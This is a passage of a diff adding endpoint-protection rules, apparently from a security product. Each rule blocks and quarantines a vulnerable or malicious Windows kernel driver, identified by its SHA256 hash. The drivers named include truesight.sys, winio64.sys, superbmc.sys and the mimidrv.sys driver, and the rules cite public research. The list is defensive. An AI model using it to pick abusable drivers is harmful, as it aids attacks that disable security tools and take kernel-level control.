+ "creation_date": "2026-03-23T11:45:31.827124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827129Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dac13ca91fa4f17531ce45e45bccec7002fdbe06e98024dcc381c776597e71f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "268a1631-c5d7-546a-8b22-f8ba5bc4be4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819708Z",
+ "creation_date": "2026-03-23T11:45:30.819710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7c90cf3fdbbd2f40fe6a39ad0bb2a9a97a0416354ea84db3aeff6d925d14df8",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "268fa52c-572f-523f-8362-1f082a70d4a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142290Z",
+ "creation_date": "2026-03-23T11:45:31.142292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc9a724d6d780f8ee8f7886d76af56c468d8f07ddaf73cbcdbe81c31a1dca48e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2696f880-975a-59b7-9a6c-49640b758c08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476015Z",
+ "creation_date": "2026-03-23T11:45:30.476019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4cd80f4e33b713570f6a16b9f77679efa45a466737e41db45b41924e7d7caef4",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26972ca1-43f9-59bf-a417-675280ad5003",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467122Z",
+ "creation_date": "2026-03-23T11:45:30.467125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467134Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7af0efdd72c68fdd105bb73be148ab7bf78a157cb1b241a85362a5bc5da91bd8",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26a6443a-f007-57ff-9d69-cc9cb00469ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489428Z",
+ "creation_date": "2026-03-23T11:45:31.489431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "772d31d79540f53faf5ed28a387cc99e23407ab295d3693851fe965636c78e43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26aaf21a-8cd9-50e0-a94b-2e70e4581ad1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811814Z",
+ "creation_date": "2026-03-23T11:45:31.811816Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "efc3f6440458ec128e330625cf51b5bda7b263d0e5e1cfef9afd30d72a9e73f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26b2151d-ada0-5833-ac6e-1bf1c701dd67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493435Z",
+ "creation_date": "2026-03-23T11:45:31.493437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03390ac3179dc0e5ab229aef1a92432fc1ffe9df1071b03428ca1a79e86ff8f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26b45be2-6bf6-5870-8a3e-0309852fabbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140944Z",
+ "creation_date": "2026-03-23T11:45:31.140954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140960Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d8efa46efdfdfc8f675d8c6e3a7e51e07ae18d12494eedd73bb6baf557fef30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26c36caf-918e-5c49-824c-6d2190f00e86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142417Z",
+ "creation_date": "2026-03-23T11:45:31.142419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142424Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd8d5c2713d271898bbd78a5e0abf8986ae9c13745f825b3930c2ada5471f3d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26c50bb7-0e62-581c-b0f7-29f04cb44a27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832497Z",
+ "creation_date": "2026-03-23T11:45:30.832499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832504Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7265f79ec6c42608f45fdf76ad40036961cd4f2dc363c4be17945072b609d584",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26cc6f6a-c6a1-5e5c-b663-93b9bdfb420c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820670Z",
+ "creation_date": "2026-03-23T11:45:31.820673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "721355b5059f9d9848904d7e5aefd6699894572e124b64eefd7e85e24d4718e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26d63f78-52d9-5f3f-9472-18070b6219f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619648Z",
+ "creation_date": "2026-03-23T11:45:29.619650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26dcffe7-19fa-5ecf-a693-d01afd4d363c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472583Z",
+ "creation_date": "2026-03-23T11:45:31.472586Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aaf2de85b1b2273e7c8219501fb64d3a2e619482886f44943cf0a08249a9ad08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26e9eaca-e011-5b8c-9dcf-3d55a3bba399",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982325Z",
+ "creation_date": "2026-03-23T11:45:29.982327Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf",
+ "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26eaa7ee-31ce-52da-9788-6487b7853f37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480451Z",
+ "creation_date": "2026-03-23T11:45:30.480453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480458Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6d1ee0455068b74cf537388c874acb335382876aa9d74586efb05d6cc362ae5",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26edeed9-0339-5a3e-bd71-040559cebecd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819544Z",
+ "creation_date": "2026-03-23T11:45:31.819547Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819556Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0bda209a54ce2eefdee85a78d7ef74c6895df59d61491e61b8955792fbf00cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "26f04b06-51e1-59a2-ab5e-d0788f75290a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156586Z",
+ "creation_date": "2026-03-23T11:45:31.156588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156593Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e18fb11eb435c9b2ebd3bf0798bf5e82c2d48c225e51a2f21190c36f94b32337",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "271bb663-62ed-53d7-902b-a7f7fcfc2c4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494492Z",
+ "creation_date": "2026-03-23T11:45:31.494494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ca6e8b9f468bb37760c53e11323052fe506f4290a4bae5d4a3ff6c59338bb6c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "271eb340-7270-57d5-96ac-ec1108392ce3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148060Z",
+ "creation_date": "2026-03-23T11:45:31.148062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46fbac19393a95999b24bab3d0f6fa027781ece014aeb09197d2968b0b260a0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27283ed3-7201-5b9f-b086-f0c766515683",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463942Z",
+ "creation_date": "2026-03-23T11:45:30.463952Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463961Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8684aec77b4c3cafc1a6594de7e95695fa698625d4206a6c4b201875f76a5b38",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "272f120e-e794-507d-93d3-da9e49da91c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826999Z",
+ "creation_date": "2026-03-23T11:45:30.827001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e88fa4916eb1c2c5dede1a8a3ce2b868e6ed28b845c05694e54c136ab9a9fcc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "27536930-523c-51ee-b6fe-09db02f7ceb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144375Z",
+ "creation_date": "2026-03-23T11:45:31.144377Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144382Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
